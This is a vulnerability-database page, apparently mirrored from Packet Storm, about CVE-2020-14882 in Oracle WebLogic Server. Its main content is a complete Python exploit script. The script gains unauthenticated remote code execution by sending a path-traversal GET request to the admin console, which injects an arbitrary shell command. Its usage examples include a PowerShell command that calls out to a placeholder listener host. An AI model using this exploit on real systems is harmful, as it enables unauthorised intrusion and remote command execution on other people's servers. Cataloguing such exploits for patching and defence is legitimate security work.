Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Oracle WebLogic Server Remote Code Execution

🗓️ 29 Oct 2020 00:00:00Reported by Nguyen JangType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 762 Views

Oracle WebLogic Server Remote Code Execution via Unauthenticated GET reques

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Code
ReporterTitlePublishedViews
Family
Cvelist		CVE-2020-14882
21 Oct 202014:04
cvelist
GithubExploit		Exploit for CVE-2020-14882
29 Oct 202015:44
githubexploit
GithubExploit		Exploit for CVE-2020-14882
1 Nov 202013:12
githubexploit
GithubExploit		Exploit for CVE-2020-14882
10 May 202121:32
githubexploit
GithubExploit		Exploit for CVE-2020-14882
25 Feb 202112:57
githubexploit
GithubExploit		Exploit for CVE-2020-14882
9 Nov 202008:03
githubexploit
GithubExploit		Exploit for CVE-2020-14882
28 Oct 202021:28
githubexploit
GithubExploit		Exploit for CVE-2020-14882
31 Oct 202001:43
githubexploit
GithubExploit		Exploit for CVE-2020-14882
4 Nov 202003:09
githubexploit
GithubExploit		Exploit for CVE-2020-14882
29 Oct 202013:53
githubexploit
Rows per page
`#!/usr/bin/python3  
  
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request  
# Exploit Author: Nguyen Jang  
# CVE: CVE-2020-14882  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html  
  
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf  
  
import requests  
import sys  
  
from urllib3.exceptions import InsecureRequestWarning  
  
if len(sys.argv) != 3:  
print("[+] WebLogic Unauthenticated RCE via GET request")  
print("[+] Usage : python3 exploit.py http(s)://target:7001 command")  
print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")  
print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")  
exit()  
  
target = sys.argv[1]  
command = sys.argv[2]  
  
request = requests.session()  
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}  
  
print("[+] Sending GET Request ....")  
  
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)  
  
print("[+] Done !!")  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Oct 2020 00:00Current
9.9High risk
Vulners AI Score9.9
EPSS0.94454
exploitoracleweblogiccve-2020-14882rceunauthenticatedrequestvulnerabilityremote code execution
762
.json
Report